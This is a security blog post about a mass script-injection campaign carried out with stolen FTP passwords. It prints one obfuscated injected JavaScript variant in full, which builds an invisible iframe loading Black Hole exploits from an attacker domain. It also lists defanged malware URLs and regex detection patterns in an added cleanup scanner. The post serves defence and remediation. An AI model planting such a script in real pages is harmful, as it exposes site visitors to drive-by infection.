Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Massive Script Injection (k985ytv)

   23 Aug 11   Filed in Short Attack Reviews

I’d like to point webmasters at a great article on the Armorize blog. It is about a new massive script injection attack that seems to have affected a few thousand websites. In my post, I will summarize the information specifically for webmasters.

It all began about a week ago and I still see quite a few infected sites. Attackers use stolen FTP passwords to inject malicious scripts into selected legitimate web pages on compromised sites. The targeted files usually have the following words in their names: index, home, default, auth, login.

The scripts can be injected right after the <body> tag or at the very top or bottom of the HTML code. As the Armorize article shows, the first wave of the injection was buggy and you might find the script text displayed on your web pages.

Hackers update the malicious scripts every day. If you clean up your site but don’t change passwords, you’ll find your site reinfected quite soon. Because of a buggy implementation of the script updater, one page can contain multiple instances of the malicious scripts (I’ve seen 8 scripts on the same page).

At this point, I know about 5 variations of the injected script:

wa='t';p='ht'; f='k98';tb ='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(t b);oz=v.concat(k);db=p concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=docu ment.createEl ement(se);ip.setAttribute('width','1');ip.setAttr ibute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body appendChild(ip);





All 5 variants can be easily detected with Unmask Parasites:

k985ytv detected

The script creates invisible iframes that load browser exploits (Black Hole) from the following sites:

  • hxxp://zirycatum .com/k985ytv.htm
  • hxxp://cubyfonizi .com/k985ytv.htm
  • hxxp://numudozaf .com/k985ytv.htm
  • hxxp://hysofufewobe .com/k985ytv.htm
  • hxxp://rewajuseva .com/k985ytv.htm

Google blacklists infected sites. Their Safe Browsing diagnostic pages typically say something like this:

Malicious software is hosted on 4 domain(s), including dddnvf .com/, rprlpb .com/, numudozaf .com/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including zirycatum .com/, numudozaf .com/.


1. Scan all computers that have access to your website for malware.

2. Change all site passwords. Don’t save new passwords in FTP programs. Configure them so that they ask for a password every time you connect to your site. If you work with multiple sites and don’t like the idea of memorizing many passwords, consider using password managers like KeePass — they save your passwords much more securely. Remove stored passwords from FTP programs that you no longer use.

3. Consider using SFTP instead of FTP, which sends your passwords in plain text (they can be intercepted by malware on your computer and from third-party computers when you use Wi-Fi). Most popular FTP programs support SFTP, so the switch should be painless.

4. Remove malicious scripts from files on the server. The easiest way to do it is to restore your site from a clean, fresh backup copy.

5. If your site is blacklisted by Google, request a malware review via Google Webmaster Tools (Diagnostics->Malware).
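
To find which files need cleaning in step 4, here is an added example (not code from the original post or from Unmask Parasites): a Python scanner that walks a local copy of the site and flags files carrying the traits of the injected script shown above, counting how many copies each page holds. The trait names, the three-trait threshold, the extension list and the constructed `SAMPLE` are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# File-name words the post lists as usual targets.
TARGET_WORDS = ("index", "home", "default", "auth", "login")
WEB_EXT = {".htm", ".html", ".php", ".asp", ".aspx"}  # assumed extension list

# Traits of the injected code shown in the post (names are hypothetical).
TRAITS = {
    "fragments": re.compile(r"(?:\w{1,3}=['\"][^'\"]{0,4}['\"];){8,}"),
    "concat": re.compile(r"concat\("),
    "element_from_var": re.compile(r"document\.createElement\(\w+\)"),
    "one_pixel": re.compile(r"setAttribute\(['\"](?:width|height)['\"],['\"]1['\"]\)"),
}

# Constructed, inert sample with the same shape (placeholder host, never attached).
SAMPLE = ("<body><script>a='p';b='ht';c='t';d='://';e='exa';f='mpl';g='e.i';"
          "h='nva';i='lid';j='/x';k='ifr';l='ame';m=k.concat(l);"
          "n=b.concat(c,a,d,e,f,g,h,i,j);var q=document.createElement(m);"
          "q.setAttribute('width','1');q.setAttribute('height','1');</script>"
          "<h1>Welcome</h1></body>")


def scan_text(text):
    """Return (instances, traits_found) for one file's contents."""
    # Strip all whitespace so copies broken up by spaces or newlines still match.
    squeezed = re.sub(r"\s+", "", text)
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(squeezed))
    # Each injected copy starts with one run of fragment assignments.
    instances = len(TRAITS["fragments"].findall(squeezed))
    return instances, hits


def scan_tree(root, min_traits=3):
    """Return [(path, name_is_usual_target, instances)] for suspicious files."""
    found = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXT:
            instances, hits = scan_text(path.read_text(errors="replace"))
            if len(hits) >= min_traits:
                usual = any(w in path.stem.lower() for w in TARGET_WORDS)
                found.append((path, usual, instances))
    return found


if __name__ == "__main__":
    for path, usual, n in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: {n} injected copy/copies, usual target name: {usual}")
```

Run it against a downloaded copy of the site; files outside the usual name list are still reported, since the post says the targeted names are only typical.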

Reader's Comments

  1. […] Sinegubko advises webmasters to scan all computers that have access to their websites for malware. Furthermore, […]